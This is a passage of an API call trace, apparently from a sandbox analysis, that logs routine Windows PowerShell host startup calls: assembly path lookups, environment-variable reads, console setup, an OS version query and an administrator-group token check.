	[0456.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0457.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ed760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0457.490] SetErrorMode (uMode=0x1) returned 0x1
	[0457.490] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ed9e0 | out: lpFileInformation=0x1ed9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0457.490] SetErrorMode (uMode=0x1) returned 0x1
	[0459.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0459.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0459.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0459.441] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0459.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0459.441] CoTaskMemFree (pv=0x484630) 
	[0459.445] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0459.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0459.445] CoTaskMemFree (pv=0x484630) 
	[0459.446] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0459.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0459.446] CoTaskMemFree (pv=0x484630) 
	[0459.448] CoCreateGuid (in: pguid=0x1edda8 | out: pguid=0x1edda8*(Data1=0xbdc0153a, Data2=0x3aab, Data3=0x4d72, Data4=([0]=0x8c, [1]=0x20, [2]=0x2, [3]=0x67, [4]=0x1e, [5]=0xb8, [6]=0x8d, [7]=0x6f))) returned 0x0
	[0459.451] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0459.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0459.451] CoTaskMemFree (pv=0x484630) 
	[0459.453] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0459.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0459.454] CoTaskMemFree (pv=0x484630) 
	[0459.943] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0459.943] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0459.944] CoTaskMemFree (pv=0x484630) 
	[0459.949] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0459.951] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1eda50 | out: lpConsoleScreenBufferInfo=0x1eda50) returned 1
	[0459.956] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0459.956] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1eda50 | out: lpConsoleScreenBufferInfo=0x1eda50) returned 1
	[0459.957] GetVersionExW (in: lpVersionInformation=0x1ed9e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed9e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0459.959] GetCurrentProcess () returned 0xffffffffffffffff
	[0459.960] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1eda78 | out: TokenHandle=0x1eda78*=0x1c4) returned 1
	[0459.963] GetTokenInformation (in: TokenHandle=0x1c4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed998 | out: TokenInformation=0x0, ReturnLength=0x1ed998) returned 0
	[0459.964] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x407290
	[0459.964] GetTokenInformation (in: TokenHandle=0x1c4, TokenInformationClass=0x8, TokenInformation=0x407290, TokenInformationLength=0x4, ReturnLength=0x1ed998 | out: TokenInformation=0x407290, ReturnLength=0x1ed998) returned 1
	[0459.964] DuplicateTokenEx (in: hExistingToken=0x1c4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1edaf8 | out: phNewToken=0x1edaf8*=0x1bc) returned 1
	[0459.964] GetTokenInformation (in: TokenHandle=0x1c4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed998 | out: TokenInformation=0x0, ReturnLength=0x1ed998) returned 0
	[0459.965] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4072c0
	[0459.965] GetTokenInformation (in: TokenHandle=0x1c4, TokenInformationClass=0x8, TokenInformation=0x4072c0, TokenInformationLength=0x4, ReturnLength=0x1ed998 | out: TokenInformation=0x4072c0, ReturnLength=0x1ed998) returned 1
	[0459.965] CheckTokenMembership (in: TokenHandle=0x1bc, SidToCheck=0x2e93950*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1edb08 | out: IsMember=0x1edb08) returned 1
	[0459.965] CloseHandle (hObject=0x1bc) returned 1
	[0460.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0460.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0460.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0460.481] CoTaskMemAlloc (cb=0x804) returned 0x1b82dd20
	[0460.481] GetConsoleTitleW (in: lpConsoleTitle=0x1b82dd20, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0460.481] CoTaskMemFree (pv=0x1b82dd20) 
	[0461.017] CoTaskMemAlloc (cb=0x804) returned 0x1b82e5d0
	[0461.017] GetConsoleTitleW (in: lpConsoleTitle=0x1b82e5d0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0461.017] CoTaskMemFree (pv=0x1b82e5d0) 
	[0461.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.020] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0461.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.993] SetConsoleCtrlHandler (HandlerRoutine=0x2bd68dc, Add=1) returned 1
	[0463.012] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c0
	[0463.014] CoCreateGuid (in: pguid=0x1edbf0 | out: pguid=0x1edbf0*(Data1=0x471f6d4d, Data2=0x225c, Data3=0x4f10, Data4=([0]=0xb4, [1]=0xa0, [2]=0xd0, [3]=0x58, [4]=0x8, [5]=0x95, [6]=0x90, [7]=0xa0))) returned 0x0
	[0463.016] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0463.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.016] CoTaskMemFree (pv=0x484630) 
	[0463.454] WinSqmIsOptedIn () returned 0x0
	[0463.455] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0463.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.455] CoTaskMemFree (pv=0x484630) 
	[0463.456] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0463.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.456] CoTaskMemFree (pv=0x484630) 
	[0463.456] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0463.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.456] CoTaskMemFree (pv=0x484630) 
	[0463.457] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0463.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.457] CoTaskMemFree (pv=0x484630) 
	[0463.457] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0463.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.458] CoTaskMemFree (pv=0x484630) 
	[0463.459] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0463.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.459] CoTaskMemFree (pv=0x484630) 
	[0463.459] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0463.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.459] CoTaskMemFree (pv=0x484630) 
	[0463.460] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0463.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.460] CoTaskMemFree (pv=0x484630) 
	[0463.463] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0463.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.463] CoTaskMemFree (pv=0x484630) 
	[0463.473] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0463.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.473] CoTaskMemFree (pv=0x484630) 
	[0463.477] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0463.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.477] CoTaskMemFree (pv=0x484630) 
	[0463.478] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0463.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.478] CoTaskMemFree (pv=0x484630) 
	[0466.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
